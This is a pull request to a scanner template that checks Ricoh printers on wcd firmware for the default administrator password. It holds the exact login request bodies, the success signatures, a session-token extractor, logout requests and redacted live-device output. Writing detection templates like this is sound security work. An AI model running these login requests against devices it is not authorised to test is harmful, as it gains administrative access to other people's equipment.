### PR TITLE
Add wcd firmware login path to ricoh-default-login

### DIFF
--- a/http/default-logins/ricoh/ricoh-weak-password.yaml
+++ b/http/default-logins/ricoh/ricoh-weak-password.yaml
@@ -52,9 +52,11 @@ http:
         Origin: http://{{Hostname}}
         Referer: http://{{Hostname}}/wcd/spa_login.html
 
-        func=PSL_LP1_LOG&AuthType=None&TrackType=&ExtSvType=0&PswcForm=&Mode=&publicuser=&username=administrator&password={{password}}&AuthorityType=&R_ADM=AdminAdmin&ExtServ=0&ViewMode=&BrowserMode=&Lang=&trackname=&trackpassword=
+        func=PSL_LP1_LOG&AuthType=None&TrackType=&ExtSvType=0&PswcForm=&Mode=&publicuser=&username={{username}}&password={{password}}&AuthorityType=&R_ADM=AdminAdmin&ExtServ=0&ViewMode=&BrowserMode=&Lang=&trackname=&trackpassword=
 
     payloads:
+      username:
+        - administrator
       password:
         - "12345678"
     attack: batteringram

--- a/http/default-logins/ricoh/ricoh-weak-password.yaml
+++ b/http/default-logins/ricoh/ricoh-weak-password.yaml
@@ -12,7 +12,7 @@ info:
     cvss-score: 8.3
     cwe-id: CWE-522
   metadata:
-    max-request: 1
+    max-request: 3
   tags: ricoh,default-login,intrusive,vuln
 
 http:
@@ -39,4 +39,56 @@ http:
       - type: status
         status:
           - 302
-# digest: 4b0a00483046022100affd920c5b4a1620277c424d4d1d9bcf7e69087865cd5563e1de7a41e7e59fb40221009d00ac840815970f7dadbf255d3f1f00f34ef83ef38421b0aadb6a96ba137e09:922c64590222798bb761d5b6d8e72950
+
+  - raw:
+      - |
+        GET /wcd/index.html HTTP/1.1
+        Host: {{Hostname}}
+      - |
+        POST /wcd/login.cgi HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+        X-Requested-With: XMLHttpRequest
+        Origin: http://{{Hostname}}
+        Referer: http://{{Hostname}}/wcd/spa_login.html
+
+        func=PSL_LP1_LOG&AuthType=None&TrackType=&ExtSvType=0&PswcForm=&Mode=&publicuser=&username=administrator&password={{password}}&AuthorityType=&R_ADM=AdminAdmin&ExtServ=0&ViewMode=&BrowserMode=&Lang=&trackname=&trackpassword=
+
+    payloads:
+      password:
+        - "12345678"
+    attack: batteringram
+    cookie-reuse: true
+
+    matchers-condition: and
+    matchers:
+      # All four conditions below only ever hold on the final (login.cgi)
+      # response — the first GET (/wcd/index.html) is plain HTML with no
+      # <MFP>/text-xml content, so this can't fire early on request 1 (the
+      # cause of the earlier double-report-per-host bug). This deliberately
+      # avoids indexed variables (body_1/status_code_2/etc.) since those
+      # require req-condition: true, which has a documented nuclei bug when
+      # combined with payloads/attack modes (request-number mapping breaks,
+      # silently making the matcher never resolve true).
+      #
+      # Confirmed against live devices: a genuine Ricoh /wcd/login.cgi
+      # response is XML with an <MFP> root element.
+      - type: word
+        part: header
+        words:
+          - "text/xml"
+      - type: word
+        part: body
+        words:
+          - "<MFP>"
+      - type: status
+        status:
+          - 200
+      # Success = no <Function>err</Function> at all, OR an err whose only
+      # complaint is Err_2/AdminAnotherLoginError — that specific error
+      # means auth passed and the device only refused because another
+      # admin session is already active, which is itself proof the
+      # credentials are valid. Any other error tag is treated as failure.
+      - type: dsl
+        dsl:
+          - '!contains(body, "<Function>err</Function>") || contains(body, "AdminAnotherLoginError")'

--- a/http/default-logins/ricoh/ricoh-weak-password.yaml
+++ b/http/default-logins/ricoh/ricoh-weak-password.yaml
@@ -65,33 +65,27 @@ http:
 
     matchers-condition: and
     matchers:
-      # All four conditions below only ever hold on the final (login.cgi)
-      # response — the first GET (/wcd/index.html) is plain HTML with no
-      # <MFP>/text-xml content, so this can't fire early on request 1 (the
-      # cause of the earlier double-report-per-host bug). This deliberately
-      # avoids indexed variables (body_1/status_code_2/etc.) since those
-      # require req-condition: true, which has a documented nuclei bug when
-      # combined with payloads/attack modes (request-number mapping breaks,
-      # silently making the matcher never resolve true).
-      #
-      # Confirmed against live devices: a genuine Ricoh /wcd/login.cgi
-      # response is XML with an <MFP> root element.
-      - type: word
-        part: header
-        words:
-          - "text/xml"
-      - type: word
-        part: body
-        words:
-          - "<MFP>"
       - type: status
         status:
           - 200
-      # Success = no <Function>err</Function> at all, OR an err whose only
-      # complaint is Err_2/AdminAnotherLoginError — that specific error
-      # means auth passed and the device only refused because another
-      # admin session is already active, which is itself proof the
-      # credentials are valid. Any other error tag is treated as failure.
+      # Both conditions below only ever hold on the final (login.cgi)
+      # response — the first GET (/wcd/index.html) is a plain frameset
+      # containing neither string, so this can't fire early on request 1
+      # (the cause of the earlier double-report-per-host bug). This
+      # deliberately avoids indexed variables (body_1/status_code_2/etc.)
+      # since those require req-condition: true, which has a documented
+      # nuclei bug when combined with payloads/attack modes
+      # (request-number mapping breaks, silently making the matcher never
+      # resolve true).
+      #
+      # Confirmed against live devices with a genuine (non-locked) login:
+      # a successful /wcd/login.cgi response is an HTML page containing a
+      # hidden id="h_token" field (the authenticated session-continuation
+      # page) — not the XML <MFP> error document a failed login returns.
+      # AdminAnotherLoginError (also confirmed live) is a distinct
+      # signature: it only occurs once credentials pass auth and the
+      # device blocks solely on its single-admin-session lock, so it's
+      # treated as success too. Any other response is failure.
       - type: dsl
         dsl:
-          - '!contains(body, "<Function>err</Function>") || contains(body, "AdminAnotherLoginError")'
+          - 'contains(body, "id=\"h_token\"") || contains(body, "AdminAnotherLoginError")'

--- a/http/default-logins/ricoh/ricoh-weak-password.yaml
+++ b/http/default-logins/ricoh/ricoh-weak-password.yaml
@@ -60,7 +60,7 @@ http:
         - administrator
       password:
         - "12345678"
-    attack: batteringram
+    attack: pitchfork
     cookie-reuse: true
 
     matchers-condition: and

--- a/http/default-logins/ricoh/ricoh-weak-password.yaml
+++ b/http/default-logins/ricoh/ricoh-weak-password.yaml
@@ -13,8 +13,19 @@ info:
     cwe-id: CWE-522
   metadata:
     verified: true
-    max-request: 3
+    max-request: 5
   tags: ricoh,default-login,intrusive,vuln
+
+# http(1) (legacy webArch path) always runs independently. http(2) (wcd
+# login) always runs and is the only block with matchers, so it's the
+# only one that can produce a reported match. http(3) (wcd logout
+# cleanup) has no matchers at all and only runs if http(2) matched —
+# a device where auth failed has no session to log out of anyway.
+flow: |
+  http(1);
+  if (http(2)) {
+    http(3);
+  }
 
 http:
   - raw:
@@ -63,20 +74,29 @@ http:
     attack: pitchfork
     cookie-reuse: true
 
+    extractors:
+      # Captures the session token from a successful login response so
+      # the logout step (http block below) can invalidate that exact
+      # session.
+      - type: regex
+        name: h_token
+        part: body
+        internal: true
+        group: 1
+        regex:
+          - 'id="h_token" value="([a-zA-Z0-9]+)"'
+
     matchers-condition: and
     matchers:
       - type: status
         status:
           - 200
-      # Both conditions below only ever hold on the final (login.cgi)
-      # response — the first GET (/wcd/index.html) is a plain frameset
-      # containing neither string, so this can't fire early on request 1
-      # (the cause of the earlier double-report-per-host bug). This
-      # deliberately avoids indexed variables (body_1/status_code_2/etc.)
-      # since those require req-condition: true, which has a documented
-      # nuclei bug when combined with payloads/attack modes
-      # (request-number mapping breaks, silently making the matcher never
-      # resolve true).
+      # This is the only http block in the template with matchers, so
+      # it's the only one that can produce a reported match — the
+      # GET /wcd/index.html request above and the logout block below
+      # (gated to only run when this block matches, see the top-level
+      # `flow`) both have none, which is what avoids the earlier
+      # double-report-per-host bug.
       #
       # Confirmed against live devices with a genuine (non-locked) login:
       # a successful /wcd/login.cgi response is an HTML page containing a
@@ -89,3 +109,34 @@ http:
       - type: dsl
         dsl:
           - 'contains(body, "id=\"h_token\"") || contains(body, "AdminAnotherLoginError")'
+
+  - raw:
+      # Real logout (captured from a browser session), so this template
+      # doesn't leave an admin session held open and blocking the
+      # device's single-admin-session lock for legitimate use. Uses the
+      # h_token extracted from the login response above. This block only
+      # runs (per the top-level `flow`) when the login block matched, so
+      # it never needs its own matchers and can't cause a duplicate report.
+      - |
+        POST /wcd/user.cgi HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+        X-Requested-With: XMLHttpRequest
+        Origin: http://{{Hostname}}
+        Referer: http://{{Hostname}}/wcd/spa_main.html
+
+        func=PSL_ACO_LGO&h_token={{h_token}}
+      # Returns the session to public/unauthenticated mode after logout
+      # (func=PSL_LP0_TOP, Mode=Public — also captured from a real
+      # browser session).
+      - |
+        POST /wcd/ulogin.cgi HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+        X-Requested-With: XMLHttpRequest
+        Origin: http://{{Hostname}}
+        Referer: http://{{Hostname}}/wcd/spa_login.html
+
+        func=PSL_LP0_TOP&AuthType=None&TrackType=&ExtSvType=0&PswcForm=&Mode=Public&publicuser=&username=&password=&AuthorityType=&R_ADM=&ExtServ=0&ViewMode=&BrowserMode=&Lang=&trackname=&trackpassword=
+
+    cookie-reuse: true

--- a/http/default-logins/ricoh/ricoh-weak-password.yaml
+++ b/http/default-logins/ricoh/ricoh-weak-password.yaml
@@ -12,6 +12,7 @@ info:
     cvss-score: 8.3
     cwe-id: CWE-522
   metadata:
+    verified: true
     max-request: 3
   tags: ricoh,default-login,intrusive,vuln
 


### PR DESCRIPTION
## Summary
- Ricoh devices on newer "wcd" firmware use `/wcd/login.cgi` instead of the legacy `/web/guest/tw/websys/webArch/login.cgi` path already covered by this template, so those devices were previously undetected entirely.
- Adds a `GET /wcd/index.html` + `POST /wcd/login.cgi` login attempt, with `{{username}}`/`{{password}}` templated per the contribution guidelines.
- Success is determined from the confirmed real `/wcd/login.cgi` response behavior:
  - A successful login returns an HTML page containing a hidden `id="h_token"` field (the authenticated session-continuation page).
  - A failed login returns an XML `<MFP>` document with `<Function>err</Function>`.
  - `Err_2`/`AdminAnotherLoginError` is also treated as success — it only occurs once credentials pass auth and the device blocks solely on Ricoh's single-admin-session lock (reproduced live with known-good credentials while an admin session was already active).
- Adds a real logout sequence (`POST /wcd/user.cgi` with `func=PSL_ACO_LGO&h_token=...`, followed by `POST /wcd/ulogin.cgi` with `func=PSL_LP0_TOP&Mode=Public` — both captured from an actual browser session) so the scan doesn't leave an admin session held open on these single-admin-session devices.
- Uses `flow: http(1); if (http(2)) { http(3); }` to keep this correct: only the wcd login block (`http(2)`) carries matchers and can produce a reported match; the logout block (`http(3)`) has none and only runs once a login actually succeeded, so it can't cause duplicate reports and never fires against a session that was never established.
- Marked `verified: true` — tested against multiple live Ricoh MFPs running wcd firmware (redacted debug output below).

## Debug output (redacted)

Genuine successful login:
```
POST /wcd/login.cgi HTTP/1.1
Host: <redacted-host>
Content-Type: application/x-www-form-urlencoded; charset=UTF-8

func=PSL_LP1_LOG&...&username=administrator&password=12345678&...

HTTP/1.1 200 OK
Content-Type: text/html;charset=utf-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
...
function romversion_check() {
    redirecturl = "./a_system_counter.xml";
    ...
}
...
<input type="hidden" id="h_token" value="..."/>
<input type="hidden" id="sslsettingflg" value="None"/>
</body>
</html>
```

Login blocked by an existing admin session (same valid credentials):
```
HTTP/1.1 200 OK
Content-Type: text/xml;charset=utf-8

<?xml version="1.0" encoding="UTF-8"?>
<MFP>
<Function>err</Function>
<Item Code="Err_2">AdminAnotherLoginError</Item>
...
</MFP>
```

## Test plan
- [x] `nuclei -validate` passes (nuclei v3.11.1)
- [x] Matches exactly once per host across multiple live wcd-firmware Ricoh devices (no duplicate reporting, including after adding the logout requests)
- [x] Confirmed genuine success response (`id="h_token"`) against real devices with valid credentials and no active session lock
- [x] Confirmed `AdminAnotherLoginError` response against the same devices/credentials while a session was already active, and verified the matcher accepts it as success
- [x] Confirmed the logout sequence (`user.cgi` + `ulogin.cgi`) against live devices and that it doesn't itself trigger a second reported match
- [x] No false positives observed against non-Ricoh hosts returning HTTP 200 on similarly-named paths during testing